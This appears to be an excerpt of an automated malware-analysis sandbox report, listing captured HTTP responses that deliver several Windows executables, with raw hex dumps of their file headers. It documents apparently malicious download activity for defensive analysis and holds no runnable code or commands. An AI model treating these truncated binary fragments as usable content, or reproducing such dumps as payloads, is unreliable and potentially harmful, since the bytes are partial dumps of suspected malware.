5d 8c 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 93 01 00 28 00 00 00 00 f0 c1 03 88 68 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 c3 03 5c 14 00 00 00 32 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 88 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 93 18 01 00 00 10 00 00 00 1a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ce 6c 00 00 00 30 01 00 00 6e 00 00 00 1e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a8 4b c0 03 00 a0 01 00 00 72 01 00 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 68 01 00 00 f0 c1 03 00 6a 01 00 00 fe 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 14 00 00 00 60 c3 03 00 16 00 00 00 68 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Apr 2024 00:19:06 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Apr 2024 00:19:29 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Apr 2024 00:19:40 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Apr 2024 00:19:46 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Apr 2024 00:19:52 GMTContent-Type: application/x-msdos-programContent-Length: 2046288Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Apr 2024 00:19:53 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 15 Mar 2024 11:59:56 GMTETag: "4a4030-613b1bf118700"Accept-Ranges: bytesContent-Length: 4866096Content-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 84 e1 90 58 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 c4 35 00 00 50 14 00 00 00 00 00 60 d5 35 00 00 10 00 00 00 e0 35 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 4a 00 00 04 00 00 60 c3 4a 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 37 00 9c 4e 00 00 00 d0 3c 00 eb fe 0d 00 00 00 00 00 00 00 00 00 00 18 4a 00 30 28 00 00 00 30 38 00 84 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 38 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 be 37 00 e0 0b 00 00 00 00 38 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 85 35 00 00 10 00 00 00 86 35 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 3c 3d 00 00 00 a0 35 00 00 3e 00 00 00 8a 35 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 b0 56 01 00 00 e0 35 00 00 58 01 00 00 c8 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 8c 6d 00 00 00 40 37 00 00 00 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9c 4e 00 00 00 b0 37 00 00 50 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 d2 09 00 00 00 00 38 00 00 0a 00 00 00 70 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 10 38 00 00 00 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 38 00 00 02 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 84 9a 04 00 00 30 38 00 00 9c 04 00 00 7c 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 eb fe 0d 00 00 d0 3c 00 00 00 0e 00 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Apr 2024 00:20:17 GMTContent-Type: application/x-msdos-programContent-Length: 257872Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 